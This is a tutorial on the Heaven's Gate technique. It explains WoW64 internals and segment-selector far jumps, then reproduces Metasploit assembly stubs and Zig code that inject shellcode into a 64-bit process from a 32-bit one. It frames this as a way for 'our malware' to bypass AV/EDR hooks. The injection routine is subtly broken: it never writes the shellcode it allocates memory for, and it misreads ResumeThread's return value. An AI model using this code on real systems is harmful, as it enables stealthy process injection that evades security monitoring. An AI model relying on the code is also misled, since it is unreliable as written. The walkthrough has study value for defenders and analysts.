Heaven's Gate

TL;DR

Heaven's Gate is a technique enabling 32-bit processes, particularly within the WoW64 environment, to execute native 64-bit code. It functions by altering the Code Segment (CS) register, using value 0x23 for 32-bit mode and 0x33 for 64-bit mode. This transition is performed via a "far jump," allowing a 32-bit application to temporarily operate with 64-bit instructions and capabilities. A primary advantage of Heaven's Gate is its ability to bypass certain AV (antivirus) and EDR (Endpoint Detection and Response) hooks, as the malicious code switches to 64-bit mode and interacts directly with 64-bit ntdll.dll functions, circumventing monitoring on the 32-bit layer. Its implementation involves specialized assembly stubs to manage the mode switching and the execution of 64-bit functions.

WoW64 Architecture

Windows 32-bit on Windows 64-bit (WoW64) is a translation layer built into 64-bit Windows that "translates" 32-bit system interrupts into 64-bit system calls.

Figure: WoW64 Transitioning

This figure comes from FireEye's 2020 research. It shows that every WoW64 process has two ntdll modules loaded in memory: a 32-bit one and a 64-bit one. The functions in the 32-bit ntdll module (on the left) are the final system functions reached by any Win32 API that a 32-bit application calls under WoW64. However, a native 64-bit system cannot execute 32-bit system interrupts directly. Therefore, the call edx instruction actually invokes the WoW64 translation layer, which translates the 32-bit system interrupt into a 64-bit system call and dispatches it to the corresponding system function in the 64-bit ntdll module (on the right).

But why can't a 64-bit system handle a 32-bit system interrupt directly? Because the two environments differ in data layout and calling convention. For example:

  1. Data Structure Layout:

    The same data structure is laid out differently in memory on 32-bit and 64-bit systems, mainly because pointers and handles grow from 4 to 8 bytes. WoW64 therefore has to copy the contents of every 32-bit structure passed as a parameter into the equivalent 64-bit structure.

  2. Parameter Passing:

    In the 32-bit calling conventions, parameters are pushed onto the stack in order. In the x64 calling convention, the first four parameters are placed in rcx, rdx, r8, and r9, and the rest go on the stack. WoW64 therefore has to rearrange the 32-bit parameters according to the x64 calling convention so that the 64-bit system calls find them where they expect.
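To make the data-layout point concrete, here is a minimal sketch in C of one descriptor in a 32-bit and a 64-bit layout, plus a helper that widens one into the other. The names String32, String64, and widen_string are hypothetical and exist only for this illustration; they are not the real WoW64 definitions. The size checks assume a typical x86-64 ABI in which 8-byte integers are 8-byte aligned.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical 32-bit layout: the buffer address is 4 bytes wide. */
typedef struct {
    uint16_t length;
    uint16_t maximum_length;
    uint32_t buffer;          /* 32-bit address */
} String32;

/* Hypothetical 64-bit layout of the same descriptor: the address is
 * 8 bytes wide, which also forces 4 bytes of padding in front of it. */
typedef struct {
    uint16_t length;
    uint16_t maximum_length;
    uint64_t buffer;          /* 64-bit address */
} String64;

/* Assumes an ABI where uint64_t is 8-byte aligned (e.g. x86-64). */
static_assert(sizeof(String32) == 8, "32-bit layout is 8 bytes");
static_assert(sizeof(String64) == 16, "64-bit layout is 16 bytes");
static_assert(offsetof(String32, buffer) == 4, "no padding in 32-bit layout");
static_assert(offsetof(String64, buffer) == 8, "address is 8-byte aligned");

/* Copy every field into the wider layout, zero-extending the address.
 * A byte-for-byte copy would not work because the offsets differ. */
String64 widen_string(String32 in)
{
    String64 out;
    out.length = in.length;
    out.maximum_length = in.maximum_length;
    out.buffer = (uint64_t)in.buffer;
    return out;
}
```

The same field-by-field widening has to happen for every pointer-bearing structure that crosses the boundary, which is why a translation layer is needed at all.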

RunSimulatedCode

Every WoW64 process actually hosts a 32-bit program inside a native 64-bit process. This means that every WoW64 process starts as a 64-bit thread that performs a series of initialization tasks. It then transitions into 32-bit mode by calling a specific function in wow64cpu.dll, RunSimulatedCode, before finally jumping to the entry point of the 32-bit program.

Figure: RunSimulatedCode disassembly

The figure shows the disassembly of RunSimulatedCode generated by Binary Ninja. Three details in the code are important:

  1. It points the r12 register at the current thread's 64-bit TEB structure, read through gs:0x30.
  2. It points the r15 register at TurboThunkDispatch, a list of pointers stored in the global variables of wow64cpu.dll.
  3. In the 64-bit TEB, offset +0x1488 from the base address refers to the thread's 32-bit context structure. The function saves this value into the r13 register, and the structure is used as a snapshot of the 32-bit thread context.

For point 3, since a WoW64 process must frequently switch between 32-bit and 64-bit execution modes during runtime, each thread maintains a dedicated memory space to store its current execution context, such as instruction pointer, register states, and stack information.

The address of this context block is consistently stored at offset +0x1488 in the 64-bit TEB (Thread Environment Block). This detail is crucial and will be leveraged for exploitation later in this article.

TurboThunkDispatch

Figure: TurboThunkDispatch

As mentioned above, TurboThunkDispatch is an array of 32 function pointers. Two of these functions deserve our attention.

  1. CpupReturnFromSimulatedCode is the first 64-bit entry point when transitioning from 32-bit back to 64-bit execution. Whenever a 32-bit program triggers a system interrupt by invoking a 32-bit system call, it enters this function in wow64cpu.dll. The function saves the current 32-bit thread context, then jumps to TurboDispatchJumpAddressEnd, which in turn invokes the corresponding 64-bit ntdll function to emulate the intended system call.
  2. TurboDispatchJumpAddressEnd, the first function in the array, invokes the translator function Wow64SystemServiceEx, which is exported by wow64.dll, to emulate the system interrupt. Once the emulation is complete, it restores the thread context from the previously saved state and returns to the 32-bit application's return address, so the application continues seamlessly.

Heaven's Gate

Heaven's Gate relies on the CS (code segment) register: loading it with a different segment selector switches the CPU between 32-bit and 64-bit mode. The CS value determines which instruction set the CPU uses to decode the instructions that follow.

  • 0x23
    • 32-bit thread mode in WoW64 process
  • 0x33
    • Native 64-bit thread
  • 0x1B
    • Native 32-bit thread

The process performs a far jump to the 0x33 segment to execute the desired 64-bit instructions, then returns to 32-bit mode with a far jump back to the 0x23 segment. This technique gives a 32-bit process 64-bit capabilities.
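The three CS values listed above are ordinary x86 segment selectors, so they can be split into their standard fields: a descriptor table index, a table indicator bit, and a requested privilege level. The sketch below does that in C; the Selector type and decode_selector function are hypothetical names used only for this illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Fields of an x86 segment selector. */
typedef struct {
    unsigned index; /* bits 15..3: index into the descriptor table */
    unsigned ti;    /* bit 2: 0 = GDT, 1 = LDT                     */
    unsigned rpl;   /* bits 1..0: requested privilege level        */
} Selector;

Selector decode_selector(uint16_t sel)
{
    Selector s;
    s.index = sel >> 3;
    s.ti    = (sel >> 2) & 1u;
    s.rpl   = sel & 3u;
    return s;
}

/* All three values from the list are ring-3 selectors. */
static_assert((0x23 & 3) == 3 && (0x33 & 3) == 3 && (0x1B & 3) == 3,
              "user-mode privilege level");
```

Decoded this way, 0x1B, 0x23, and 0x33 are GDT entries 3, 4, and 6, all with privilege level 3. The far jump therefore never changes privilege; it only selects a different user-mode code segment descriptor.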

Using Heaven's Gate in our malware has several advantages, including but not limited to the following.

  1. Run 64-bit code directly from our 32-bit program under WoW64:

    We don't need a 64-bit executable or process to perform 64-bit operations; Heaven's Gate lets the 32-bit process do the same.

  2. Bypass some AV/EDR detections:

    Some AV/EDR products focus on hooking the 32-bit ntdll.dll because our program is 32-bit. When we switch to 64-bit mode and call into the 64-bit ntdll.dll, those API hooks are bypassed.

Code Walkthrough

execute64.asm

To implement Heaven's Gate, we can use the code from Metasploit Meterpreter. The following is the execute64.asm stub that it provides.

;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP
; Architecture: wow64
; Version: 1.0 (Jan 2010)
; Size: 75 bytes
; Build: >build.py executex64
;-----------------------------------------------------------------------------;

; A simple function to execute native x64 code from a wow64 (x86) process.
; Can be called from C using the following prototype:
;     typedef DWORD (WINAPI * EXECUTEX64)( X64FUNCTION pFunction, DWORD dwParameter );
; The native x64 function you specify must be in the following form (as well as being x64 code):
;     typedef BOOL (WINAPI * X64FUNCTION)( DWORD dwParameter );

; Clobbers: EAX, ECX and EDX (ala the normal stdcall calling convention)
; Un-Clobbered: EBX, ESI, EDI, ESP and EBP can be expected to remain un-clobbered.

[BITS 32]

WOW64_CODE_SEGMENT EQU 0x23
X64_CODE_SEGMENT EQU 0x33

start:
 push ebp         ; prologue, save EBP...
 mov ebp, esp       ; and create a new stack frame
 push esi        ; save the registers we shouldn't clobber
 push edi        ;
 mov esi, [ebp+8]      ; ESI = pFunction
 mov ecx, [ebp+12]      ; ECX = dwParameter
 call delta        ;
delta:
 pop eax         ;
 add eax, (native_x64-delta)    ; get the address of native_x64

 sub esp, 8        ; alloc some space on stack for far jump
 mov edx, esp       ; EDX will be pointer our far jump
 mov dword [edx+4], X64_CODE_SEGMENT  ; set the native x64 code segment
 mov dword [edx], eax     ; set the address we want to jump to (native_x64)

 call go_all_native      ; perform the transition into native x64 and return here when done.

 mov ax, ds        ; fixes an elusive bug on AMD CPUs, http://blog.rewolf.pl/blog/?p=1484
 mov ss, ax        ; found and fixed by ReWolf, incorporated by RaMMicHaeL

 add esp, (8+4+8)      ; remove the 8 bytes we allocated + the return address which was never popped off + the qword pushed from native_x64
 pop edi         ; restore the clobbered registers
 pop esi         ;
 pop ebp         ; restore EBP
 retn (4*2)        ; return to caller (cleaning up our two function params)

go_all_native:
 mov edi, [esp]       ; EDI is the wow64 return address
 jmp dword far [edx]      ; perform the far jump, which will return to the caller of go_all_native

native_x64:
[BITS 64]         ; we are now executing native x64 code...
 xor rax, rax       ; zero RAX
 push rdi        ; save RDI (EDI being our wow64 return address)
 call rsi        ; call our native x64 function (the param for our native x64 function is allready in RCX)
 pop rdi         ; restore RDI (EDI being our wow64 return address)
 push rax        ; simply push it to alloc some space
 mov dword [rsp+4], WOW64_CODE_SEGMENT ; set the wow64 code segment
 mov dword [rsp], edi     ; set the address we want to jump to (the return address from the go_all_native call)
 jmp dword far [rsp]      ; perform the far jump back to the wow64 caller...

At the start label, the function runs its prologue: it saves the registers it must preserve and loads the two parameters into registers.

start:
 push ebp         ; prologue, save EBP...
 mov ebp, esp       ; and create a new stack frame
 push esi        ; save the registers we shouldn't clobber
 push edi        ;
 mov esi, [ebp+8]      ; ESI = pFunction
 mov ecx, [ebp+12]      ; ECX = dwParameter
 call delta        ;

It then uses a common shellcode trick to obtain the current instruction pointer: call delta pushes the address of the next instruction (the return address) onto the stack, and at the delta label, pop eax retrieves that address into eax. The shellcode now knows the address it is running at, which can be used for further calculations.

The following code computes the address of native_x64 dynamically. (native_x64-delta) is an offset known at assembly time; adding it to the runtime address obtained by pop eax gives the absolute address of native_x64.

 call delta        ;
delta:
 pop eax         ;
 add eax, (native_x64-delta)    ; get the address of native_x64
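The arithmetic behind this trick can be written out in C as a small sketch. The function resolve_label and its parameter names are hypothetical; the point is only that the distance between two labels is fixed when the stub is assembled, so it stays valid wherever the stub is loaded.

```c
#include <assert.h>
#include <stdint.h>

/* runtime_delta: the value popped into EAX, i.e. where `delta` really is.
 * link_delta, link_target: the addresses the assembler gave the labels.
 * Returns the runtime address of the target label. */
uint32_t resolve_label(uint32_t runtime_delta,
                       uint32_t link_delta,
                       uint32_t link_target)
{
    /* In the stub, native_x64 comes after delta. */
    assert(link_target >= link_delta);
    return runtime_delta + (link_target - link_delta);
}
```

For example, with made-up numbers: if delta was assembled at 0x10 and native_x64 at 0x4A, and the stub finds delta at 0x00401010 at run time, then native_x64 is at 0x0040104A.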

When it's ready to execute the native_x64 instructions, Heaven's Gate is used to switch to 64-bit mode and execute the code. This is done by setting up a far jump, which uses the following code format.

jmp segment:offset
; [edx]     = offset (low 4 bytes)
; [edx+4]   = segment selector (high 2 bytes)

This is equivalent to

jmp dword far [edx]      ; perform the far jump, which will return to the caller of go_all_native

To prepare this far jump, the code writes the offset and the segment selector to the stack, then executes the far jump instruction. The go_all_native function is the entry point of Heaven's Gate: it switches to 64-bit mode and runs the selected 64-bit function with the passed argument.
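The memory operand of the far jump can be modeled in C as a plain byte buffer. The sketch below fills an 8-byte slot the same way the stub does; build_far_pointer is a hypothetical helper, and the byte checks assume a little-endian host, as x86 is.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Selector values from the article. */
enum { WOW64_CODE_SEGMENT = 0x23, X64_CODE_SEGMENT = 0x33 };

/* Fill an 8-byte stack slot like the stub: a 32-bit offset at +0 and the
 * selector at +4. The far jump reads only the first 6 bytes (a 32-bit
 * offset followed by a 16-bit selector). The stub stores the selector as
 * a dword, so bytes 6..7 are written as zero and then ignored. */
void build_far_pointer(uint8_t slot[8], uint32_t offset, uint16_t selector)
{
    uint32_t selector_dword = selector;

    assert(slot != NULL);
    memcpy(slot, &offset, 4);             /* mov dword [edx], eax     */
    memcpy(slot + 4, &selector_dword, 4); /* mov dword [edx+4], 0x33  */
}
```

The stub reserves 8 bytes rather than 6 simply because it writes two dwords; only the 6-byte far pointer matters to the CPU.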

When the 64-bit code completes, execution returns to the instruction right after the call to go_all_native. To make this possible, go_all_native reads the return address from the top of the stack (without popping it) and saves it in edi before performing the far jump. This manually saved return address is later used to jump back from 64-bit mode to 32-bit mode, again through Heaven's Gate. Let's see the implementation in assembly.

X64_CODE_SEGMENT EQU 0x33
 ...
 sub esp, 8        ; alloc some space on stack for far jump
 mov edx, esp       ; EDX will be pointer our far jump
 mov dword [edx+4], X64_CODE_SEGMENT  ; set the native x64 code segment
 mov dword [edx], eax     ; set the address we want to jump to (native_x64)

 call go_all_native      ; perform the transition into native x64 and return here when done.
 ...

go_all_native:
 mov edi, [esp]       ; EDI is the wow64 return address
 jmp dword far [edx]      ; perform the far jump, which will return to the caller of go_all_native

The native_x64 code is written in 64-bit assembly and runs in 64-bit processor mode. It calls the specified function pointer with the given parameter. After that function returns, it prepares another far jump to switch back to 32-bit mode, this time using 0x23 as the CS value and the WoW64 return address saved earlier in rdi.

WOW64_CODE_SEGMENT EQU 0x23
...
native_x64:
[BITS 64]         ; we are now executing native x64 code...
 xor rax, rax       ; zero RAX
 push rdi        ; save RDI (EDI being our wow64 return address)
 call rsi        ; call our native x64 function (the param for our native x64 function is allready in RCX)
 pop rdi         ; restore RDI (EDI being our wow64 return address)
 push rax        ; simply push it to alloc some space
 mov dword [rsp+4], WOW64_CODE_SEGMENT ; set the wow64 code segment
 mov dword [rsp], edi     ; set the address we want to jump to (the return address from the go_all_native call)
 jmp dword far [rsp]      ; perform the far jump back to the wow64 caller...
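One detail worth working through is why the 32-bit side of the full listing cleans up with add esp, (8+4+8) after the round trip. The sketch below tallies the stack usage in C. The function name leftover_stack_bytes is hypothetical, and the tally assumes the called 64-bit function leaves the stack balanced.

```c
#include <assert.h>

/* Bytes that are still on the stack when control is back in 32-bit mode. */
enum {
    FAR_POINTER_SLOT = 8, /* sub esp, 8                                   */
    RETURN_ADDRESS   = 4, /* pushed by `call go_all_native`, never popped */
    PUSHED_QWORD     = 8  /* `push rax` in native_x64                     */
};

static_assert(FAR_POINTER_SLOT + RETURN_ADDRESS + PUSHED_QWORD == 8 + 4 + 8,
              "matches add esp, (8+4+8)");

/* Walk the instructions between `sub esp, 8` and the jump back. */
int leftover_stack_bytes(void)
{
    int bytes = 0;
    bytes += FAR_POINTER_SLOT; /* sub esp, 8                           */
    bytes += RETURN_ADDRESS;   /* call go_all_native                   */
    bytes += 8;                /* push rdi                             */
    bytes += 8;                /* call rsi pushes a return address     */
    bytes -= 8;                /* the called function's ret pops it    */
    bytes -= 8;                /* pop rdi                              */
    bytes += PUSHED_QWORD;     /* push rax, used as the far pointer    */
    return bytes;
}
```

Neither far jump touches the stack pointer, so the 20 bytes counted here are exactly what the 32-bit code has to discard.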

Through the execute64.asm stub, we gain a clearer understanding of how Heaven’s Gate is implemented and how it enables the execution of native 64-bit code from a WoW64 process.

remotethread.asm

In this section, we go through the remotethread.asm stub from Metasploit Framework, which creates a remote thread in a target process from 64-bit mode. Before we start, we need to define a structure laid out for the x64 environment rather than x86, because it is passed to the 64-bit function.

This structure contains the process handle, the start address of the remote shellcode, the parameter for the shellcode, and a field that receives the thread handle once the remote thread is created. The structure is named WOW64CONTEXT, and it looks like this.

pub const WOW64CONTEXT = extern struct {
    h: extern union {
        hProcess: HANDLE,
        bPadding2: [8]BYTE,
    },
    s: extern union {
        lpStartAddress: ?LPVOID,
        bPadding1: [8]BYTE,
    },
    p: extern union {
        lpParameter: ?LPVOID,
        bPadding2: [8]BYTE,
    },
    t: extern union {
        hThread: ?HANDLE,
        bPadding2: [8]BYTE,
    },
};

In the structure above, each entry is padded to 8 bytes so that there is enough room for 64-bit addresses and handles. hThread acts as an output parameter through which we receive the remote thread handle. The assembly stub below first prepares the environment and the parameters, then calls the RtlCreateUserThread function. Afterwards, the stub checks the returned NTSTATUS to determine whether the remote thread was created, and converts it into a boolean: TRUE on success, FALSE on failure. On success, a new thread exists in the target process in a suspended state.
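The padding can be checked with a small model in C. Wow64ContextModel and read_slot are hypothetical names for this sketch, and uint32_t stands in for the 4-byte HANDLE and LPVOID types of a 32-bit process so that the layout is the same on any host. The value checks assume a little-endian machine.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Each 4-byte handle or pointer shares an 8-byte slot with padding. */
typedef struct {
    union { uint32_t hProcess;       uint8_t bPadding2[8]; } h;
    union { uint32_t lpStartAddress; uint8_t bPadding1[8]; } s;
    union { uint32_t lpParameter;    uint8_t bPadding2[8]; } p;
    union { uint32_t hThread;        uint8_t bPadding2[8]; } t;
} Wow64ContextModel;

/* The offsets line up with the [rsi], [rsi+8], [rsi+16], [rsi+24]
 * operands used by the 64-bit stub. */
static_assert(offsetof(Wow64ContextModel, h) == 0,  "[rsi]");
static_assert(offsetof(Wow64ContextModel, s) == 8,  "[rsi+8]");
static_assert(offsetof(Wow64ContextModel, p) == 16, "[rsi+16]");
static_assert(offsetof(Wow64ContextModel, t) == 24, "[rsi+24]");
static_assert(sizeof(Wow64ContextModel) == 32, "four 8-byte slots");

/* Read one slot as a full qword, as the 64-bit code does. */
uint64_t read_slot(const Wow64ContextModel *ctx, size_t offset)
{
    uint64_t value;

    assert(offset % 8 == 0 && offset + 8 <= sizeof *ctx);
    memcpy(&value, (const uint8_t *)ctx + offset, 8);
    return value;
}
```

Because the 64-bit side reads whole qwords, the upper half of each slot has to be zero. That is the reason to zero the structure before filling in the 32-bit fields.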

;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008R2, 2008, 2003, XP
; Architecture: x64
; Version: 1.0 (Jan 2010)
; Size: 296 bytes
; Build: >build.py remotethread
;-----------------------------------------------------------------------------;

; Function to create a remote thread via ntdll!RtlCreateUserThread, used with the x86 executex64 stub.

; This function is in the form (where the param is a pointer to a WOW64CONTEXT):
;     typedef BOOL (WINAPI * X64FUNCTION)( DWORD dwParameter );


[BITS 64]
[ORG 0]
    cld                    ; Clear the direction flag.
    mov rsi, rcx           ; RCX is a pointer to our WOW64CONTEXT parameter
    mov rdi, rsp           ; save RSP to RDI so we can restore it later, we do this as we are going to force alignment below...
    and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned (as we originate from a wow64 (x86) process we cant guarantee alignment)
    call start             ; Call start, this pushes the address of 'api_call' onto the stack.
delta:                     ;
%include "./src/block/block_api.asm"
start:                     ;
    pop rbp                ; Pop off the address of 'api_call' for calling later.
    ; setup the parameters for RtlCreateUserThread...
    xor r9, r9             ; StackZeroBits = 0
    push r9                ; ClientID = NULL
    lea rax, [rsi+24]      ; RAX is now a pointer to ctx->t.hThread
    push rax               ; ThreadHandle = &ctx->t.hThread
    push qword [rsi+16]    ; StartParameter = ctx->p.lpParameter
    push qword [rsi+8]     ; StartAddress = ctx->s.lpStartAddress
    push r9                ; StackCommit = NULL
    push r9                ; StackReserved = NULL
    mov r8, 1              ; CreateSuspended = TRUE
    xor rdx, rdx           ; SecurityDescriptor = NULL
    mov rcx, [rsi]         ; ProcessHandle = ctx->h.hProcess
    ; perform the call to RtlCreateUserThread...
    mov r10d, 0x40A438C8   ; hash( "ntdll.dll", "RtlCreateUserThread" )
    call rbp               ; RtlCreateUserThread( ctx->h.hProcess, NULL, TRUE, 0, NULL, NULL, ctx->s.lpStartAddress, ctx->p.lpParameter, &ctx->t.hThread, NULL )
    test rax, rax          ; check the NTSTATUS return value
    jz success             ; if its zero we have successfully created the thread so we should return TRUE
    mov rax, 0             ; otherwise we should return FALSE
    jmp cleanup            ;
success:
    mov rax, 1             ; return TRUE
cleanup:
    add rsp, (32 + (8*6))  ; fix up stack (32 bytes for the single call to api_call, and 6*8 bytes for the six params we pushed).
    mov rsp, rdi           ; restore the stack
    ret                    ; and return to caller

The comments beside each line explain the assembly. Since it is not closely related to Heaven's Gate, I'll leave the details for you to work through on your own.
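Two pieces of stack bookkeeping in the stub are easy to verify by hand: the forced 16-byte alignment at the top and the fix-up constant at the bottom. The C sketch below reproduces both; align_down_16 and the enum names are hypothetical helpers for this illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Round a stack pointer down to a 16-byte boundary, which is what
 * `and rsp, 0xFFFFFFFFFFFFFFF0` does. The stack grows downward, so
 * rounding down never overwrites data the caller already pushed. */
uint64_t align_down_16(uint64_t rsp)
{
    return rsp & ~(uint64_t)0xF;
}

enum {
    API_CALL_BYTES = 32, /* per the stub's comment: 32 bytes for api_call */
    PUSHED_PARAMS  = 6,  /* six qword arguments pushed before the call    */
    FIXUP_BYTES    = API_CALL_BYTES + 8 * PUSHED_PARAMS
};

static_assert(FIXUP_BYTES == 80, "add rsp, (32 + (8*6))");
static_assert((8 * PUSHED_PARAMS) % 16 == 0, "six pushes keep the alignment");
```

Note that the stub restores the original stack pointer from rdi right after the fix-up, so the saved value is what finally determines rsp on return.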

To make this easier to understand, the assembly above can be simplified into the following C pseudocode.

BOOL Function64( PWOW64CONTEXT ctx ) {
    if ( !NT_SUCCESS( RtlCreateUserThread( ctx->h.hProcess, NULL, TRUE, 0, NULL, NULL, ctx->s.lpStartAddress, ctx->p.lpParameter, &ctx->t.hThread, NULL ) ) ) {
        return FALSE;
    } else {
        return TRUE;
    }
}
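The pseudocode and the assembly are not quite the same check: NT_SUCCESS accepts any non-negative status, while the stub's test rax, rax / jz pair accepts only zero. The sketch below shows the difference in C. NtStatus, nt_success, and stub_success are hypothetical stand-ins, not Windows SDK definitions.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Stand-in for NTSTATUS, which is a signed 32-bit value. */
typedef int32_t NtStatus;

static_assert(sizeof(NtStatus) == 4, "NTSTATUS is 32 bits wide");

/* Same test as the NT_SUCCESS macro: non-negative means success. */
bool nt_success(NtStatus status)
{
    return status >= 0;
}

/* What the assembly stub checks: only a zero status counts. */
bool stub_success(NtStatus status)
{
    return status == 0;
}
```

Both agree on zero (STATUS_SUCCESS) and on error codes such as 0xC0000005, which are negative as signed values. They differ only for positive informational statuses, which the stub would report as a failure.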

wow64Inject

First, we check that all the parameters are valid.

    if (process_id == 0 or shellcode_buf == null or shellcode_len == 0) {
        return 0;
    }

After that, we cast the stub bytes stored in the .text section to function pointers.

    fn_execute64 = @ptrCast(@alignCast(&bExecute64[0]));
    fn_function64 = @ptrCast(@alignCast(&bFunction64[0]));

Next, we open a handle to the remote process so that we can operate on it.

    process_handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, process_id);
    if (process_handle == null) {
        print("[-] OpenProcess Failed with Error: {x}\n", .{GetLastError()});
        return success;
    }

Once we have the handle, we use the isProcessWow64 function to check the preconditions for Heaven's Gate: the current process must be a WoW64 process, and the remote process must not be.

    if (isProcessWow64(GetCurrentProcess()) == 0) {
        print("[-] Current process is not a Wow64 process\n", .{});
        if (process_handle) |handle| {
            _ = CloseHandle(handle);
        }
        return success;
    } else {
        print("[*] Current process is Wow64\n", .{});
    }

    if (isProcessWow64(process_handle.?) != 0) {
        print("[-] Remote process {d} is a Wow64 process\n", .{process_id});
        if (process_handle) |handle| {
            _ = CloseHandle(handle);
        }
        return success;
    }

Next, we need to allocate executable memory in the remote process and write the shellcode into it.

    virtual_memory = VirtualAllocEx(process_handle.?, null, shellcode_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (virtual_memory == null) {
        print("[-] VirtualAllocEx Failed with Error: {d}\n", .{GetLastError()});
        if (process_handle) |handle| {
            _ = CloseHandle(handle);
        }
        return success;
    }

Now we can prepare the WoW64 context and perform the Heaven's Gate injection.

    wow64_ctx.h.hProcess = process_handle.?;
    wow64_ctx.s.lpStartAddress = virtual_memory;
    wow64_ctx.p.lpParameter = null;
    // hThread is already zeroed from std.mem.zeroes

    print("[*] About to execute Heaven's Gate transition...\n", .{});

    // switch the processor to be 64-bit mode and execute
    // the 64-bit code stub that will create a remote thread
    // in the remote 64-bit process
    const result = fn_execute64(fn_function64, @ptrCast(&wow64_ctx));
    print("[*] Heaven's Gate transition completed, result: {d}\n", .{result});

    if (result == 0) {
        print("[-] Failed to switch processor context and execute 64-bit stub\n", .{});
        if (process_handle) |handle| {
            _ = CloseHandle(handle);
        }
        return success;
    }

    if (@intFromPtr(wow64_ctx.t.hThread) == 0) { // If thread handle is null
        print("[-] Failed to create remote thread under 64-bit mode\n", .{});
        if (process_handle) |handle| {
            _ = CloseHandle(handle);
        }
        return success;
    }

Finally, we need to resume the suspended thread and clean up the handle.

    if (ResumeThread(wow64_ctx.t.hThread) == 0) {
        print("[-] ResumeThread Failed with Error: {d}\n", .{GetLastError()});
        if (process_handle) |handle| {
            _ = CloseHandle(handle);
        }
        return success;
    }

    print("[+] Successfully injected thread ({x})\n", .{@intFromPtr(wow64_ctx.t.hThread)});

    success = 1;

    // Cleanup
    if (process_handle) |handle| {
        _ = CloseHandle(handle);
    }

    return success;